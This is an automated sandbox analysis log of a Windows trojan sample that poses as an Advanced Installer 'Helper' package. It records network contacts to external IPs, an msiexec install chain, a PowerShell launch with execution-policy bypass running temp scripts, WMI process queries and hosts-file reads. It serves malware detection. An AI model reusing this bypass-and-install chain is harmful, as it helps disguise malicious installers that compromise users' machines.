          Source: unknownTCP traffic detected without corresponding DNS query: 45.135.232.24
          Source: unknownTCP traffic detected without corresponding DNS query: 45.135.232.24
          Source: unknownTCP traffic detected without corresponding DNS query: 45.135.232.24
          Source: unknownTCP traffic detected without corresponding DNS query: 45.135.232.24
          Source: unknownTCP traffic detected without corresponding DNS query: 45.135.232.24
          Source: unknownTCP traffic detected without corresponding DNS query: 45.135.232.24
          Source: unknownTCP traffic detected without corresponding DNS query: 45.135.232.24
          Source: unknownTCP traffic detected without corresponding DNS query: 45.135.232.24
          Source: unknownTCP traffic detected without corresponding DNS query: 45.135.232.24
          Source: unknownTCP traffic detected without corresponding DNS query: 45.135.232.24
          Source: unknownTCP traffic detected without corresponding DNS query: 45.135.232.24
          Source: unknownTCP traffic detected without corresponding DNS query: 45.135.232.24
          Source: unknownTCP traffic detected without corresponding DNS query: 45.135.232.24
          Source: unknownTCP traffic detected without corresponding DNS query: 45.135.232.24
          Source: unknownTCP traffic detected without corresponding DNS query: 45.135.232.24
          Source: unknownTCP traffic detected without corresponding DNS query: 45.135.232.24
          Source: unknownTCP traffic detected without corresponding DNS query: 45.135.232.24
          Source: unknownTCP traffic detected without corresponding DNS query: 45.135.232.24
          Source: unknownTCP traffic detected without corresponding DNS query: 45.135.232.24
          Source: unknownTCP traffic detected without corresponding DNS query: 45.135.232.24
          Source: unknownTCP traffic detected without corresponding DNS query: 45.135.232.24
          Source: unknownTCP traffic detected without corresponding DNS query: 45.135.232.24
          Source: unknownTCP traffic detected without corresponding DNS query: 45.135.232.24
          Source: unknownTCP traffic detected without corresponding DNS query: 45.135.232.24
          Source: unknownTCP traffic detected without corresponding DNS query: 45.135.232.24
          Source: unknownTCP traffic detected without corresponding DNS query: 45.135.232.24
          Source: unknownTCP traffic detected without corresponding DNS query: 45.135.232.24
          Source: unknownTCP traffic detected without corresponding DNS query: 45.135.232.24
          Source: unknownTCP traffic detected without corresponding DNS query: 45.135.232.24
          Source: unknownTCP traffic detected without corresponding DNS query: 45.135.232.24
          Source: unknownTCP traffic detected without corresponding DNS query: 45.135.232.24
          Source: unknownTCP traffic detected without corresponding DNS query: 45.135.232.24
          Source: unknownTCP traffic detected without corresponding DNS query: 45.135.232.24
          Source: unknownTCP traffic detected without corresponding DNS query: 45.135.232.24
          Source: unknownTCP traffic detected without corresponding DNS query: 45.135.232.24
          Source: unknownTCP traffic detected without corresponding DNS query: 45.135.232.24
          Source: unknownTCP traffic detected without corresponding DNS query: 45.135.232.24
          Source: unknownTCP traffic detected without corresponding DNS query: 45.135.232.24
          Source: unknownTCP traffic detected without corresponding DNS query: 45.135.232.24
          Source: unknownTCP traffic detected without corresponding DNS query: 45.135.232.24
          Source: unknownTCP traffic detected without corresponding DNS query: 45.135.232.24
          Source: unknownTCP traffic detected without corresponding DNS query: 45.135.232.24
          Source: unknownTCP traffic detected without corresponding DNS query: 45.135.232.24
          Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, 00000000.00000000.368260539.00000000005A8000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: JFlashWindowFlashWindowExGetPackagePathhttp://www.yahoo.comhttp://www.example.comhttp://www.google.comTESTtin9999.tmpattachment=.partGETcharsetDLD "filenameutf-8utf-16123POSTAdvancedInstallerLocal Network ServerISO-8859-1US-ASCIIHTTP/1.0Range: bytes=%u- equals www.yahoo.com (Yahoo)
          Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeString found in binary or memory: UFlashWindowFlashWindowExGetPackagePathhttp://www.yahoo.comhttp://www.example.comhttp://www.google.comTESTtin9999.tmpattachment=.partGETcharsetDLD "filenameutf-8utf-16123POSTAdvancedInstallerLocal Network ServerISO-8859-1US-ASCIIHTTP/1.0Range: bytes=%u- equals www.yahoo.com (Yahoo)
          Source: unknownHTTPS traffic detected: 81.177.140.69:443 -> 192.168.2.3:49736 version: TLS 1.2
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeCode function: 0_2_004867F00_2_004867F0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeCode function: 0_2_004AAC300_2_004AAC30
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeCode function: 0_2_0037E2300_2_0037E230
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeCode function: 0_2_0037C3630_2_0037C363
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeCode function: 0_2_0053839A0_2_0053839A
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeCode function: 0_2_0044C4500_2_0044C450
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeCode function: 0_2_003884B00_2_003884B0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeCode function: 0_2_0052869E0_2_0052869E
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeCode function: 0_2_003547720_2_00354772
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeCode function: 0_2_005068400_2_00506840
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeCode function: 0_2_004729A00_2_004729A0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeCode function: 0_2_00528A2C0_2_00528A2C
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeCode function: 0_2_0047EAF00_2_0047EAF0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeCode function: 0_2_00374B300_2_00374B30
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeCode function: 0_2_00378E200_2_00378E20
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeCode function: 0_2_0053CE190_2_0053CE19
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeCode function: 0_2_00352EA00_2_00352EA0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeCode function: 0_2_003711B00_2_003711B0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeCode function: 0_2_0054328A0_2_0054328A
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeCode function: 0_2_003873A00_2_003873A0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeCode function: 0_2_0036F4200_2_0036F420
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeCode function: 0_2_003C75000_2_003C7500
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeCode function: 0_2_003796500_2_00379650
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeCode function: 0_2_0038B7200_2_0038B720
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeCode function: 0_2_003574800_2_00357480
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeCode function: 0_2_005079000_2_00507900
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeCode function: 0_2_0037F9F00_2_0037F9F0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeSection loaded: lpk.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeSection loaded: tsappcmp.dllJump to behavior
          Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dllJump to behavior
          Source: C:\Windows\System32\msiexec.exeSection loaded: tsappcmp.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: tsappcmp.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
          Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
          Source: C:\Windows\System32\msiexec.exeFile deleted: C:\Windows\Installer\MSI69F0.tmpJump to behavior
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\6766e2.msiJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeCode function: String function: 00359610 appears 121 times
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeCode function: String function: 00358190 appears 56 times
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeCode function: String function: 0035A140 appears 49 times
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeCode function: String function: 0035A6D0 appears 54 times
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeCode function: 0_2_0042A630 GetSystemDirectoryW,LoadLibraryExW,NtdllDefWindowProc_W,0_2_0042A630
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeCode function: 0_2_004B1D40 NtdllDefWindowProc_W,0_2_004B1D40
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeCode function: 0_2_003C40A0 GetWindowLongW,SetWindowLongW,NtdllDefWindowProc_W,0_2_003C40A0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeCode function: 0_2_00378270 NtdllDefWindowProc_W,0_2_00378270
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeCode function: 0_2_00368280 NtdllDefWindowProc_W,0_2_00368280
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeCode function: 0_2_00368840 NtdllDefWindowProc_W,0_2_00368840
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeCode function: 0_2_00372C90 GetWindowLongW,SetWindowLongW,NtdllDefWindowProc_W,DeleteCriticalSection,0_2_00372C90
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeCode function: 0_2_0036EE70 NtdllDefWindowProc_W,0_2_0036EE70
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeCode function: 0_2_00364E60 GetWindowLongW,GetWindowLongW,GetWindowLongW,SetWindowLongW,NtdllDefWindowProc_W,GetWindowLongW,SetWindowTextW,GlobalAlloc,GlobalLock,GlobalUnlock,SetWindowLongW,NtdllDefWindowProc_W,0_2_00364E60
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeCode function: 0_2_0040EF50 NtdllDefWindowProc_W,0_2_0040EF50
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeCode function: 0_2_0036EFE0 IsWindow,GetWindowLongW,SetWindowLongW,NtdllDefWindowProc_W,0_2_0036EFE0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeCode function: 0_2_00365580 SysFreeString,GetWindowLongW,GetWindowLongW,GetWindowLongW,SetWindowLongW,NtdllDefWindowProc_W,GetWindowLongW,SetWindowTextW,GlobalAlloc,GlobalLock,GlobalUnlock,SetWindowLongW,SysFreeString,NtdllDefWindowProc_W,SysFreeString,0_2_00365580
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeCode function: 0_2_00367B50 GetWindowLongW,SetWindowLongW,NtdllDefWindowProc_W,DestroyWindow,0_2_00367B50
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeCode function: 0_2_00365BE0 NtdllDefWindowProc_W,0_2_00365BE0
          Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, 00000000.00000000.368320326.0000000000641000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFileNameHelper.exe. vs SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe
          Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, 00000000.00000002.770673546.0000000006390000.00000002.00000001.00040000.0000001E.sdmpBinary or memory string: OriginalFilenamelzmaextractor.dllF vs SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe
          Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, 00000000.00000002.770673546.0000000006390000.00000002.00000001.00040000.0000001E.sdmpBinary or memory string: OriginalFilenameAICustAct.dllF vs SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe
          Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, 00000000.00000002.770673546.0000000006390000.00000002.00000001.00040000.0000001E.sdmpBinary or memory string: OriginalFilenamePrereq.dllF vs SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe
          Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, 00000000.00000002.770673546.0000000006390000.00000002.00000001.00040000.0000001E.sdmpBinary or memory string: OriginalFilenamePowerShellScriptLauncher.dllF vs SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe
          Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, 00000000.00000003.372938403.0000000005592000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamewininet.dllD vs SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe
          Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeBinary or memory string: OriginalFileNameHelper.exe. vs SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe
          Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeBinary or memory string: OriginalFilenamelzmaextractor.dllF vs SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe
          Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeBinary or memory string: OriginalFilenameAICustAct.dllF vs SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe
          Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeBinary or memory string: OriginalFilenamePrereq.dllF vs SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe
          Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeBinary or memory string: OriginalFilenamePowerShellScriptLauncher.dllF vs SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe
          Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeFile created: C:\Users\user\AppData\Roaming\Helper Company LLCJump to behavior
          Source: shi6220.tmp.0.drBinary string: oNrtCloneOpenPacket\Device\NameResTrk\Record3VtI
          Source: classification engineClassification label: mal50.troj.spyw.evad.winEXE@11/25@1/2
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeCode function: 0_2_0035A000 LoadResource,LockResource,SizeofResource,0_2_0035A000
          Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeReversingLabs: Detection: 13%
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeFile read: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe
          Source: unknownProcess created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
          Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding E08B609454A113DDC10D91901CD8422B C
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\system32\msiexec.exe" /i "C:\Users\user\AppData\Roaming\Helper Company LLC\Helper 1.0.0\install\Helper.msi" AI_SETUPEXEPATH=C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe SETUPEXEDIR=C:\Users\user\Desktop\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1692672474 "
          Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding A46D6CE3215E9284ACEDBCBDAD509E67
          Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pss6E59.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msi6E45.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scr6E46.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scr6E47.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\system32\msiexec.exe" /i "C:\Users\user\AppData\Roaming\Helper Company LLC\Helper 1.0.0\install\Helper.msi" AI_SETUPEXEPATH=C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe SETUPEXEDIR=C:\Users\user\Desktop\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1692672474 " Jump to behavior
          Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding E08B609454A113DDC10D91901CD8422B CJump to behavior
          Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding A46D6CE3215E9284ACEDBCBDAD509E67Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pss6E59.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msi6E45.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scr6E46.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scr6E47.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId=&apos;1&apos;
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId=&apos;1&apos;
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId=&apos;1&apos;
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeFile created: C:\Users\user\AppData\Local\Temp\shi6220.tmpJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeCode function: 0_2_0049E1F0 GetDiskFreeSpaceExW,0_2_0049E1F0
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\75b341f10c9579cbe1059d18f6f3b27b\mscorlib.ni.dllJump to behavior
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7984:120:WilError_01
          Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeString found in binary or memory: ComboBoxListBoxListViewINSERT INTO `` (`Property`, `Order`, `Value`, `Text`,`Binary_`) VALUES (?,?,?,?,?) TEMPORARY` (`Property`, `Order`, `Value`, `Text`) VALUES (?,?,?,?) TEMPORARYSELECT * FROM `%s` WHERE `Property`='%s' AND `Value`='%s'SELECT * FROM `%s` WHERE `Property`='%s'EditSELECT `Message` FROM `Error` WHERE `Error` = %sSELECT `Text` FROM `UIText` WHERE `Key` = '%s'tmpALLUSERS = 1ALLUSERS = 2MSIINSTALLPERUSER = 1AI_PACKAGE_TYPE = "x64"AI_PACKAGE_TYPE = "Intel64"SELECT * FROM `Control` WHERE `Dialog_` = '%s' AND `Control` = '%s'SELECT `Attributes` FROM `Control` WHERE `Dialog_` = '%s' AND `Control` = '%s'$=3WS_BORDERWS_CAPTIONWS_CHILDWS_CHILDWINDOWWS_CLIPCHILDRENWS_CLIPSIBLINGSWS_DISABLEDWS_DLGFRAMEWS_GROUPWS_HSCROLLWS_ICONICWS_SIZEBOXWS_SYSMENUWS_TABSTOPWS_THICKFRAMEWS_VISIBLEWS_VSCROLLWS_MAXIMIZEBOXWS_MAXIMIZEWS_MINIMIZEBOXWS_MINIMIZEWS_OVERLAPPEDWINDOWWS_OVERLAPPEDWS_POPUPWINDOWWS_POPUPWS_TILEDWINDOWWS_TILEDWS_EX_ACCEPTFILESWS_EX_APPWINDOWWS_EX_CLIENTEDGEWS_EX_CONTEXTHELPWS_EX_CONTROLPARENTWS_EX_DLGMODALFRAMEWS_EX_LEFTWS_EX_LEFTSCROLLBARWS_EX_LTRREADINGWS_EX_MDICHILDWS_EX_NOPARENTNOTIFYWS_EX_OVERLAPPEDWINDOWWS_EX_PALETTEWINDOWWS_EX_RTLREADINGWS_EX_STATICEDGEWS_EX_TOOLWINDOWWS_EX_TOPMOSTWS_EX_TRANSPARENTWS_EX_WINDOWEDGEWS_EX_RIGHTSCROLLBARWS_EX_RIGHTWS_EX_LAYEREDWS_EX_NOACTIVATEWS_EX_NOINHERITLAYOUTWS_EX_LAYOUTRTLWS_EX_COMPOSITEDWS_EXAI_TRIAL_MESSAGE_BODYAI_MSM_TRIAL_MESSAGE_BODYAI_APP_FILEAI_README_FILEAI_APP_ARGSAI_RUN_AS_ADMINMsiLogFileLocation[ProgramFilesFolder][LocalAppDataFolder]Programs\[ProgramFiles64Folder][CommonFilesFolder][LocalAppDataFolder]Programs\Common\[CommonFiles64Folder][WindowsFolder][LocalAppDataFolder][SystemFolder][WindowsVolume][ProgramMenuFolder][DesktopFolder][StartupFolder][TemplateFolder][AdminToolsFolder][AI_UserProgramFiles][WindowsVolume]Program Files (x86)\[AI_ProgramFiles][WindowsVolume]Program Files\MIGRATEFindRelatedProductsMigrateFeatureStatesAI_SETMIXINSTLOCATIONAPPDIRAI_RESTORE_LOCATIONSELECT `ActionProperty` FROM `Upgrade`ActionTarget`Action`='SET_APPDIR' OR `Action`='SET_SHORTCUTDIR'CustomActionSET_APPDIRSET_SHORTCUTDIRSHORTCUTDIRProgramMenuFolderAI_SH_INITEDBrowseDlgCancelDlgDiskCostDlgExitDialogMsiRMFilesInUseOutOfDiskDlgOutOfRbDiskDlgDialog_Control_(`Control_` = 'Next' OR `Control_` = 'Install') AND `Event` = 'EndDialog' AND `Argument` = 'Return'ControlEventAI_INSTALLPERUSER = "0"ALLUSERSVersionMsi >= "5.0"2MSIINSTALLPERUSERAI_NEWINSTProductLanguageAI_INTANCE_LOCATIONAI_UPGRADENoLanguageVersionStringInstallLocationAI_REPLACE_PRODUCTSAI_Replaced_Versions_ListAI_Upgrade_Replace_Question_YesBackUp_AI_Upgrade_Question_YesAI_Upgrade_Question_YesAI_Upgrade_Replace_Question_NoBackUp_AI_Upgrade_Question_NoAI_Upgrade_Question_NoYesDELETE FROM `Shortcut` WHERE `Shortcut`.`Directory_`='%s'DELETE FROM `IniFile` WHERE `IniFile`.`Section`='InternetShortcut' AND`IniFile`.`DirProperty`='%s'SELECT * FROM `%s`ShortcutIniFileAI_DESKTOP_SH0AI_STARTMENU_SHAI_QUICKLAUNCH_SHAI_STARTUP_SHAI_SHORTCUTSREGNot Installe
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
          Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
          Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeStatic file information: File size 7465048 > 1048576
          Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeStatic PE information: certificate valid
          Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x256600
          Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
          Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
          Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
          Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
          Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
          Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
          Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Binary string: wininet.pdb source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, 00000000.00000003.372938403.0000000005592000.00000004.00000020.00020000.00000000.sdmp, shi6220.tmp.0.dr
          Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\PowerShellScriptLauncher.pdb source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, Helper.msi.0.dr, MSI6D80.tmp.1.dr, 6766e2.msi.1.dr
          Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\Prereq.pdb| source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, Helper.msi.0.dr, 6766e2.msi.1.dr, MSI6B9A.tmp.1.dr
          Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\Prereq.pdb source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, Helper.msi.0.dr, 6766e2.msi.1.dr, MSI6B9A.tmp.1.dr
          Source: Binary string: wininet.pdbUGP source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, 00000000.00000003.372938403.0000000005592000.00000004.00000020.00020000.00000000.sdmp, shi6220.tmp.0.dr
          Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\lzmaextractor.pdb source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, Helper.msi.0.dr, 6766e2.msi.1.dr
